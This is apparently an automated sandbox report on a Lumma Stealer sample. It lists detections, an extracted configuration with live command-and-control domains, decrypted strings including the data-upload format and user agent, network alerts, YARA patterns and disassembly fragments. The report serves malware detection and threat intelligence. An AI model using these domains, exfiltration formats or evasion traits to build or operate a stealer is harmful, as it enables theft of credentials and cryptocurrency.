Edit tour

Windows Analysis Report
vPqd8HLs88.exe

Overview

General Information

Sample name:	vPqd8HLs88.exe renamed because original name is a hash value
Original sample name:	074f68cba07911707860af2932fda77dfae0f0eb978cbadc4f8b64cbb9be1579.exe
Analysis ID:	1573709
MD5:	38a50f01c6d152ccdfa39db654923c5a
SHA1:	aea32e51c1d549de779dd1360080696d9e3871ea
SHA256:	074f68cba07911707860af2932fda77dfae0f0eb978cbadc4f8b64cbb9be1579
Tags:	exeimmureprech-bizuser-JAMESWT_MHT
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

vPqd8HLs88.exe (PID: 7868 cmdline: "C:\Users\user\Desktop\vPqd8HLs88.exe" MD5: 38A50F01C6D152CCDFA39DB654923C5A)

WerFault.exe (PID: 7248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7868 -s 1732 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["brendon-sharjen.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz", "awake-weaves.cyou", "deafeninggeh.biz", "effecterectz.xyz", "diffuculttan.xyz"], "Build id": "HpOoIh--5defa06fc6ab"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1667924711.0000000000920000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: vPqd8HLs88.exe PID: 7868	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: vPqd8HLs88.exe PID: 7868	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vPqd8HLs88.exe PID: 7868	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T14:26:18.661689+0100	2028371	3	Unknown Traffic	192.168.2.10	49702	104.21.32.1	443	TCP
2024-12-12T14:26:20.688667+0100	2028371	3	Unknown Traffic	192.168.2.10	49703	104.21.32.1	443	TCP
2024-12-12T14:26:23.132759+0100	2028371	3	Unknown Traffic	192.168.2.10	49704	104.21.32.1	443	TCP
2024-12-12T14:26:25.684335+0100	2028371	3	Unknown Traffic	192.168.2.10	49705	104.21.32.1	443	TCP
2024-12-12T14:26:28.259338+0100	2028371	3	Unknown Traffic	192.168.2.10	49706	104.21.32.1	443	TCP
2024-12-12T14:26:31.679753+0100	2028371	3	Unknown Traffic	192.168.2.10	49707	104.21.32.1	443	TCP
2024-12-12T14:26:33.967404+0100	2028371	3	Unknown Traffic	192.168.2.10	49709	104.21.32.1	443	TCP
2024-12-12T14:26:36.032074+0100	2028371	3	Unknown Traffic	192.168.2.10	49711	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T14:26:19.383685+0100	2054653	1	A Network Trojan was detected	192.168.2.10	49702	104.21.32.1	443	TCP
2024-12-12T14:26:21.565178+0100	2054653	1	A Network Trojan was detected	192.168.2.10	49703	104.21.32.1	443	TCP
2024-12-12T14:26:37.268208+0100	2054653	1	A Network Trojan was detected	192.168.2.10	49711	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T14:26:19.383685+0100	2049836	1	A Network Trojan was detected	192.168.2.10	49702	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T14:26:21.565178+0100	2049812	1	A Network Trojan was detected	192.168.2.10	49703	104.21.32.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T14:26:18.661689+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.10	49702	104.21.32.1	443	TCP
2024-12-12T14:26:20.688667+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.10	49703	104.21.32.1	443	TCP
2024-12-12T14:26:23.132759+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.10	49704	104.21.32.1	443	TCP
2024-12-12T14:26:25.684335+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.10	49705	104.21.32.1	443	TCP
2024-12-12T14:26:28.259338+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.10	49706	104.21.32.1	443	TCP
2024-12-12T14:26:31.679753+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.10	49707	104.21.32.1	443	TCP
2024-12-12T14:26:33.967404+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.10	49709	104.21.32.1	443	TCP
2024-12-12T14:26:36.032074+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.10	49711	104.21.32.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T14:26:17.083365+0100	2058039	1	Domain Observed Used for C2 Detected	192.168.2.10	61720	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T14:26:24.296971+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.10	49704	104.21.32.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: vPqd8HLs88.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://brendon-sharjen.biz/03	Avira URL Cloud: Label: malware
Source: sordid-snaked.cyou	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz:443/apiilesCOMPUTERNAME=user-PCComSpec=C:	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz/n	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz/pia3	Avira URL Cloud: Label: malware
Source: awake-weaves.cyou	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz/i	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz/l	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz/api	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz:443/apiOn	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz/	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz/d	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz//	Avira URL Cloud: Label: malware
Source: wrathful-jammy.cyou	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz:443/api	Avira URL Cloud: Label: malware
Source: brendon-sharjen.biz	Avira URL Cloud: Label: malware
Source: https://brendon-sharjen.biz/apid2	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.vPqd8HLs88.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["brendon-sharjen.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz", "awake-weaves.cyou", "deafeninggeh.biz", "effecterectz.xyz", "diffuculttan.xyz"], "Build id": "HpOoIh--5defa06fc6ab"}

Multi AV Scanner detection for submitted file

Source: vPqd8HLs88.exe

ReversingLabs: Detection: 58%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: vPqd8HLs88.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: awake-weaves.cyou
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wrathful-jammy.cyou
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: debonairnukk.xyz
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: diffuculttan.xyz
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: effecterectz.xyz
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: deafeninggeh.biz
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: immureprech.biz
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: brendon-sharjen.biz
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1378178663.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: HpOoIh--5defa06fc6ab

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Code function: 0_2_00415871 CryptUnprotectData,

0_2_00415871

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Unpacked PE file: 0.2.vPqd8HLs88.exe.400000.0.unpack

Source: vPqd8HLs88.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49711 version: TLS 1.2

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0042C856
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1AA2111Dh]	0_2_0043E8E0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B1025CF1h	0_2_0043BC5A
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+38F6967Eh]	0_2_0040BCF7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ecx-00000258h]	0_2_00409E40
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_0043DE70
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_00423E10
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov dword ptr [esp+4Ch], C12EDF34h	0_2_00423E10
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then add ebx, 02h	0_2_00436E90
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 67F3D776h	0_2_0042CF7E
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then jmp eax	0_2_0042786E
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-000010D0h]	0_2_004248C0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 67F3D776h	0_2_004378D0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_004228F0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx eax, word ptr [ebp+00h]	0_2_00438089
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-1F0C3802h]	0_2_0041A0A0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov esi, edx	0_2_00429940
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then jmp eax	0_2_00429940
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0042B160
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, ecx	0_2_0042D180
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, ecx	0_2_0042D257
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, ecx	0_2_0042D266
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edi]	0_2_00408200
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, ecx	0_2_0042D214
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_0042BA28
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0042BA28
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	0_2_0041EAC0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-48h]	0_2_00424B57
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+4D4614C0h]	0_2_0041BB20
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ebx, ecx	0_2_0042332F
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ecx, edx	0_2_0040ABC0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0042CBC2
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0042BBE5
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+esi]	0_2_00402BB0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0042BBBB
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ecx, eax	0_2_00422C50
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00422C50
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	0_2_0041646C
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then jmp eax	0_2_0043B46E
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, eax	0_2_0042BC19
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0042BC19
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+20h]	0_2_00427C84
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then jmp eax	0_2_0043B497
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0042ACB0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00414540
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [edx]	0_2_0041654C
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00407570
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00407570
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ecx, eax	0_2_00415513
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	0_2_00416DF8
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93AD00A8h	0_2_00416DF8
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esi]	0_2_00415D8A
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_004345A0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [ecx], ax	0_2_0043B649
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then push esi	0_2_00429611
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov esi, edx	0_2_00429611
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00426E30
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0042A6E0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041D690
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	0_2_004376A0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ecx, eax	0_2_0041CF70
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0Ch]	0_2_0041BF22
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+0000008Eh]	0_2_0040DF8D
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+20h]	0_2_00427F98
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-02h]	0_2_00439FA0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-74BB2F52h]	0_2_00439FA0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00977097
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ecx-00000258h]	0_2_0095A0A7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_0098E0D7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then add ebx, 02h	0_2_009870F7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esi]	0_2_00966019
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0Ch]	0_2_0096C189
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+0000008Eh]	0_2_0095E1F4
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 67F3D776h	0_2_0097D1E5
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-02h]	0_2_0098A207
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-74BB2F52h]	0_2_0098A207
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_00974246
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0097B3C7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, ecx	0_2_0097D3E7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-1F0C3802h]	0_2_0096A307
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, ecx	0_2_0097D4BE
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_0098846B
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, ecx	0_2_0097D4CD
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then jmp eax	0_2_0097A4F5
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov dword ptr [esp+4Ch], C12EDF34h	0_2_009744E1
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, ecx	0_2_0097D47B
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edi]	0_2_00958467
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	0_2_00967584
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93AD00A8h	0_2_00967584
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D54A
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	0_2_009666D3
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then jmp eax	0_2_0098B6D5
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then jmp eax	0_2_0098B6FE
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [edx]	0_2_009667B3
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_009647A7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_009577D7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_009577D7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ecx, eax	0_2_00965779
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [ecx], ax	0_2_0098B8B0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+19E15398h]	0_2_009788C2
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0096D8F7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00984807
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	0_2_0098793B
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0097A947
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097CABD
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then push esi	0_2_00979A0A
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov esi, edx	0_2_00979A63
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 67F3D776h	0_2_00987B37
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-000010D0h]	0_2_00974B27
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00972B57
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1AA2111Dh]	0_2_0098EB47
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then jmp eax	0_2_00977C96
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_0097BC8F
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0097BC8F
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ebx, ecx	0_2_00973C11
